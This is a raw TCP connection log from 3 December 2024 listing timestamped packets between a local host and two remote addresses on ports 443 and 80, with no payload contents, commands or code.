                                                                                                            Dec 3, 2024 10:05:55.766093969 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:55.766664028 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:55.766680956 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:57.620286942 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:57.620376110 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:57.625127077 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:57.625137091 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:57.625371933 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:57.635827065 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:57.679332018 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.119368076 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.119394064 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.119410992 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.119496107 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.119518042 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.119661093 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.313786983 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.313808918 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.313847065 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.313860893 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.313884974 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.313905001 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.357358932 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.357378960 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.357419968 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.357428074 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.357448101 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.357470989 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.502698898 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.502722979 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.502800941 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.502827883 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.502866030 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.535933971 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.535955906 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.535999060 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.536007881 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.536032915 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.536051989 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.557322979 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.557338953 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.557387114 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.557394028 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.557424068 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.557442904 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.578635931 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.578670979 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.578701019 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.578706980 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.578735113 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.578747988 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.708324909 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.708353043 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.708450079 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.708478928 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.708627939 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.722376108 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.722398996 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.722495079 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.722502947 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.722554922 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.738604069 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.738620996 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.738732100 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.738739967 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.738924980 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.754652023 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.754673958 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.754865885 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.754875898 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.754924059 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.768661022 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.768687010 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.768768072 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.768779993 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.768821955 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.785936117 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.785953999 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.785994053 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.786001921 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.786030054 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.786057949 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.790663004 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.790720940 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.790728092 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.790738106 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.790766954 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.790785074 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.791547060 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.791569948 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.791583061 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.791588068 CET4434973913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.859628916 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.859661102 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.859729052 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.860805035 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.860857964 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.860935926 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.861391068 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.861399889 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.861437082 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.861526012 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.861538887 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.861613035 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.861620903 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.862201929 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862241030 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.862283945 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862709045 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862742901 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.862787962 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862835884 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862859011 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.862912893 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862929106 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:05:58.862983942 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:58.862998009 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.578475952 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.578922987 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.578948975 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.579391003 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.579396963 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.644747972 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.645184994 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.645200968 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.645627022 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.645632982 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.645699024 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.645982027 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.646008968 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.646352053 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.646358013 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.708745956 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.709078074 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.709101915 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.709486008 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.709490061 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.712173939 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.712434053 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.712445974 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:00.712800980 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:00.712805986 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.018469095 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.018493891 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.018560886 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.018593073 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.018641949 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.018783092 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.018788099 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.018802881 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.018939018 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.018970013 CET4434974513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.019010067 CET49745443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.021475077 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.021517038 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.021589041 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.021723986 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.021737099 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.089484930 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.089544058 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.089581966 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.089756966 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.089771986 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.089781046 CET49741443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.089785099 CET4434974113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.094675064 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.094701052 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.094754934 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.094784975 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.095199108 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.095238924 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.096569061 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.096597910 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.096643925 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.096811056 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.096824884 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.096841097 CET49742443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.096844912 CET4434974213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.099786997 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.099812031 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.099864960 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.102088928 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.102106094 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.102222919 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.102236032 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.162333965 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.162398100 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.162436962 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.162554026 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.162570000 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.162580013 CET49744443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.162585974 CET4434974413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.171912909 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.171937943 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.172000885 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.172013998 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.172045946 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.177730083 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.177740097 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.177750111 CET49743443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.177755117 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.177795887 CET4434974313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.230406046 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.230447054 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.230521917 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.230973959 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.230983973 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.231633902 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.231667995 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:01.231714964 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.231807947 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:01.231821060 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.736577988 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.737054110 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.737080097 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.737498999 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.737504959 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.912065983 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.912689924 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.912710905 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.913147926 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.913151979 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.915709019 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.916052103 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.916084051 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.916435003 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.916440010 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.939115047 CET4975180192.168.2.4192.186.57.30
                                                                                                            Dec 3, 2024 10:06:02.946377039 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.946693897 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.946707964 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.947051048 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:02.947055101 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.059820890 CET8049751192.186.57.30192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.059912920 CET4975180192.168.2.4192.186.57.30
                                                                                                            Dec 3, 2024 10:06:03.063219070 CET4975180192.168.2.4192.186.57.30
                                                                                                            Dec 3, 2024 10:06:03.078597069 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.079091072 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.079104900 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.079530954 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.079535961 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.171928883 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.171989918 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.172056913 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.172259092 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.172276020 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.172287941 CET49746443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.172291994 CET4434974613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.175031900 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.175084114 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.175153971 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.175343990 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.175359011 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.183887959 CET8049751192.186.57.30192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.367059946 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.367122889 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.367173910 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.368987083 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.369040966 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.369083881 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.381134033 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.381153107 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.381162882 CET49748443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.381176949 CET4434974813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.382412910 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.382445097 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.382460117 CET49747443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.382466078 CET4434974713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.383480072 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.383538008 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.383580923 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.427382946 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.427400112 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.427409887 CET49749443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.427414894 CET4434974913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.489217997 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.489264011 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.489330053 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.490303040 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.490354061 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.490401983 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.490794897 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.490802050 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.490844011 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.490997076 CET49755443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.491008043 CET4434975513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.491070986 CET49753443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.491081953 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.491147995 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.491167068 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.533402920 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.533473969 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.533534050 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.671452999 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.671483994 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.671498060 CET49750443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.671503067 CET4434975013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.709001064 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.709055901 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:03.709224939 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.762274981 CET49756443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:03.762303114 CET4434975613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:04.609683990 CET8049751192.186.57.30192.168.2.4
                                                                                                            Dec 3, 2024 10:06:04.609916925 CET8049751192.186.57.30192.168.2.4
                                                                                                            Dec 3, 2024 10:06:04.609999895 CET4975180192.168.2.4192.186.57.30
                                                                                                            Dec 3, 2024 10:06:04.610774994 CET4975180192.168.2.4192.186.57.30
                                                                                                            Dec 3, 2024 10:06:04.730648041 CET8049751192.186.57.30192.168.2.4
                                                                                                            Dec 3, 2024 10:06:04.891400099 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:04.892915010 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:04.892998934 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:04.893317938 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:04.893333912 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.205004930 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.205492020 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.205569983 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.206062078 CET49754443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.206084013 CET4434975413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.326704979 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.326780081 CET4434975213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.326922894 CET49752443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:05.336740017 CET4434975313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:05.343035936 CET4434975513.107.246.63192.168.2.4
